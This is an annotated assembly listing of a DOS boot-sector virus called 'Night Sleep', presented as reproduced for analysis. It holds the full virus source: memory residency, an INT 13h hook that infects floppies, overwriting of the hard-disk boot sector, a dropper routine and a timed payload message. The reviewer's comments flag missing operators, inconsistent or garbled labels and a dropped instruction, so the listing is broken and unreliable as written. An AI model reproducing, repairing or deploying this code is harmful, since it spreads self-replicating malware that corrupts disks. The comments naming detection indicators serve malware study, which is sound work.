; Boot-sector virus ("Night Sleep" -- see Virusmsg below). Listing reproduced for analysis only; do not assemble or run it outside an isolated, non-networked VM.
; Build method (original): TASM BOOT.ASM; TLINK BOOT.ASM;
; This produces boot.exe; running it enters at @@install (see END @@install), the dropper routine that infects the hard disk boot sector.
.286
.Model small
.code
; Entry parameters when this code runs as a boot sector (as the BIOS leaves them):
;   AX = high-end memory address            BX = 7C00H, load/start address of the boot program
;   CX = 0001H: the program was read from track CH (00), sector CL (01)
;   DX = 00 / 80H: drive the program was read from (00 = A:, 80H = C:)
;   DS = ES = SS = CS = 0, initial segment values
OFF EQU ; NOTE(review): right-hand side is missing in this listing -- presumably OFFSET (OFF is used below as "OFF @@label"); a transcription artifact, the listing will not assemble as-is
Virussize = OFF @@ End-off @@ start ; byte length of the virus body (@@start..@@End); this many bytes are copied to high memory at boot
; --- Boot-sector body -------------------------------------------------------
; Runs at 0:7C00H when an infected sector is booted. Sequence: steal 2 KB of
; conventional memory (0:413h), copy itself there, hook INT 13h from the high
; copy, infect the hard disk if booted from floppy, reload the stashed original
; boot sector to 0:7C00H, optionally show the payload message, then chain to it.
; Several label spellings in this listing are inconsistent (@@ready vs
; @@readydflopyboot, @@readyhardboot vs @@readydhardboot, @@EXITDISP vs the
; garbled label on the INT 16H line); treat them as transcription artifacts.
@@ start:; sector offset 0
JMP Short @@ begin; 2-byte short jump over the marker byte and the preserved region
Virusflag DB 'V'; infection marker at sector offset 2 -- checked by @@Optdisk before infecting; usable as a detection indicator
@@ bootdata:; the original sector's bytes from offset 3 up to 50H are preserved (the infector only overwrites 0-2 and 50H onward)
ORG 50H; the virus body starts at offset 50H; the skipped region is not used by the virus
@@ begin:; but other programs may rely on it (presumably the BPB of a DOS boot sector -- not verifiable from this listing)
MOV BX, 7C00H; BX = load address of a boot sector
MOV SP, BX; SS:SP = 0:7C00H -- stack grows down from the sector's load address
STI
MOV AX, DS: [413h]; BIOS data area 0:413h = conventional memory size in KB
Dec AX
Dec AX
MOV DS: [413H], AX; report 2 KB less memory so the resident copy is never overwritten (classic residency trick; visible as "missing" conventional memory)
MOV CL, 06
SHL AX, CL; KB * 64 = paragraph (segment) address of the stolen top-of-memory block
Mov ES, AX
XOR DI, DI
MOV Si, SP; SI = 7C00H, source = this sector as loaded
MOV CX, Virussize
CLD
REP MOVSB; copy the virus body to high memory at ES:0
Push AX
MOV DI, OFF @@ highaddr
Push di
RETF; far "return" into the high copy -- execution continues at ES:@@highaddr
@@ highaddr:; from here on CS = the high segment
CLI; interrupts off while the INT 13h vector is patched
XCHG DS: [13H * 4 2], AX; install the new INT 13h segment (AX) and fetch the old one (listing lost the "+": 13H*4+2)
MOV CS: [Oldint 13seg], AX
MOV AX, OFF @@ newint13
XCHG DS: [13H * 4], AX; install the new INT 13h offset and fetch the old one
MOV CS: [Oldint13off], AX; hook complete -- every INT 13h call now passes through @@newint13
Push DS
POP ES; ES = 0 again
CMP DL, 80H; DL = BIOS boot drive: 80H = first hard disk
JZ Short @@ readyhardboot; (defined below as @@readydhardboot -- listing inconsistency)
Push DX; booted from floppy: infect the hard disk boot sector first
MOV DL, 80H
Call @@ OptDisk; infection routine for drive DL
POP DX
@@ readydflopyboot:; reload the original floppy boot sector into 0:7C00H
MOV AX, 0201H; AH=02 read, AL=1 sector
MOV CX, 79 * 100H 17; the original sector was stashed at cylinder 79, head 0, sector 17 (listing lost the "+": 79*100H+17)
MOV DH, 00H
Call @@ Callint13
JC Short @@ ready; on error retry until it succeeds (target presumably @@readydflopyboot; "@@ready" is not defined in this listing)
@@ EXECOLDBOOT:
CMP ES: [bx.flags], 0AA55H; check the 55AAh boot signature of the reloaded sector at 7DFEh
JNZ @@ EXECOLDBOOT; NOTE: spins forever if the signature is missing -- the read is not retried here
MOV AH, 02H
INT 1AH; BIOS real-time clock: CH = hours, CL = minutes
CMP CX, 22 * 100H 30; payload trigger, intended as "time >= 22:30" (listing lost the "+"). NOTE(review): INT 1Ah/AH=02 returns BCD on real BIOSes, so a binary 22*100H+30 threshold may not match 22:30 -- confirm
JB @@ EXITDISP; earlier: hand control to the original boot code silently
Lea Si, Virusmsg
@@ Dispmsg:; print the NUL-terminated message via BIOS teletype output
MOV Al, CS: [Si]
Inc Si
Mov Ah, 0eh
INT 10H; teletype output of AL
OR Al, Al
JNZ @@ Dispmsg; stops after emitting the terminating 0
XOR AX, AX
INT 16H @@ EXIXISP:; AH=0: block until a key is pressed; the label on this line (garbled) is the @@EXITDISP target of the JB above
MOV CX, 0001H; restore CX as the BIOS left it for the boot program
Push ES
Push bx
Retf; far return to 0:7C00H -- the original boot sector runs, so the machine boots normally (stealth)
@@ readydhardboot:
MOV AX, 0201H
MOV CX, 0002H; the original hard-disk boot sector was stashed at cylinder 0, head 0, sector 2
MOV DH, 00H
Call @@ callint13; read it into 0:7C00H
JC short @@ ready; retry on error (see note on the floppy path)
JMP short @@ execOLDBoot
@@ newint13:; INT 13h hook -- the floppy infection trigger
CMP DX, 0000H; drive A: (DL=0), head 0 only
Jnz short @@ jmpoldint13
CMP AH, 02H; read-sectors request only
Jnz short @@ jmpoldint13
CMP CX, 0001H; cylinder 0, sector 1 -- the boot sector
Jnz short @@ jmpoldint13
Call @@ OptDisk; any read of A:'s boot sector infects the diskette before the request is passed on
@@ JmpoldINT13:; everything else: chain to the original handler
CLI
JMPFAR DB 0EAH; hand-assembled JMP FAR opcode; its target is the two words below, patched at hook time
Oldint13off dw?; filled in at @@highaddr (boot path) or @@iNSTALL (dropper path)
Oldint 13seg dw?
@@ callint13:; emulate an INT 13h through the saved original vector (bypasses our own hook)
Pushf; build an IRET frame: flags, CS, then the return IP pushed by the near CALL
Push CS
Call @@ JmpoldINT13
RET; CF carries the BIOS error status back to the caller
@@ Optdisk:; infect the boot sector of drive DL (00 = A:, 80H = C:)
Pusha
Push DS
Push ES; save segment and general registers
Push CS
POP ES
Push CS
POP DS; DS = ES = CS
MOV BX, Off Oldbootspace; scratch buffer for the target's current boot sector
MOV AX, 0201H
MOV CX, 0001H
MOV DH, 00H
Call @@ Callint13; read cylinder 0 / head 0 / sector 1 of drive DL
JC Short @@ optover
MOV DI, BX
CMP DS: [DI.VIRUSFLAG], 'V'; already infected? ('V' marker at offset 2)
JZ Short @@ Optover
CMP DL, 00H
JZ Short @@ isopTflopyDisk
@@ isoptharddisk:
MOV CX, 0002H; hard disk: stash the original sector at cylinder 0, head 0, sector 2
JMP short @@ saveoldboot
@@ isopTflopyDisk:
MOV CX, 79 * 100H 17; floppy: stash it at cylinder 79, head 0, sector 17 (listing lost the "+")
@@ saveoldboot:
MOV AX, 0301H; AH=03 write, 1 sector
MOV DH, 0H
Call @@ Callint13; write the untouched original sector to the stash location (the clean sector can be recovered from there)
JC Short @@ optover
Mov Si, Off @@ start
CLD
Movsw
Movsb; overwrite the first 3 bytes of the buffered sector with JMP SHORT @@begin + 'V'
MOV DI, OFF @@ Begin 200h; destination = offset 50H inside Oldbootspace (listing lost the "+": @@begin+200h)
Mov Si, Off @@ Begin
MOV CX, OFF @@ End-off @@ Begin
CLD
REP MOVSB; copy the virus body over bytes 50H..@@End of the buffered sector; bytes 3..4FH of the original survive
MOV AX, 0301H
MOV CX, 0001H
MOV DH, 00H
Call @@ callint13; write the infected sector back to cylinder 0 / head 0 / sector 1 (result not checked)
@@ Optover:; exit -- POP ES (the instruction appears to have been folded into this comment in the listing; it pairs with the Push ES above)
POP DS; restore segments and general registers
POPA
Ret; the payload text follows, including the version/author tag
Virusmsg DB 0DH, 0AH, 07H, 'Night Is Deep, You Must Go Sleep!', 0DH, 0AH, 0; payload message (07H = BEL), NUL-terminated; a useful string indicator
DB 'Night Sleep Ver 1.0, by WHG 2001.5.5', 0; version/author tag -- never printed, since @@Dispmsg stops at the first 0
@@ End:; end of the body copied to high memory and into victims (Virussize)
ORG 1FEH
Flags dw 0aa55h; boot signature at sector offset 1FEh (what @@EXECOLDBOOT checks)
Oldbootspace DB 210H DUP (?); scratch buffer at offset 200h for the target's original sector; lies past the 512-byte sector image, so it exists only in memory
@@ iNSTALL:; dropper entry point (END @@install): run as a DOS program, infects the hard disk boot sector directly
XOR AX, AX
MOV DS, AX; DS = 0, the interrupt vector table
CLI
MOV AX, DS: [13H * 4]
MOV CS: [Oldint13off], AX
MOV AX, DS: [13H * 4 2]; (listing lost the "+": 13H*4+2)
MOV CS: [Oldint 13seg], AX; save the current INT 13h vector so @@Callint13 can use it; the vector itself is not hooked here
MOV DL, 80H; target: first hard disk
Call @@ optdisk
MOV AX, 4C00H
Int 21h; DOS exit, return code 0 -- the hard disk boot sector now carries the virus; it goes resident on the next boot
End @@ install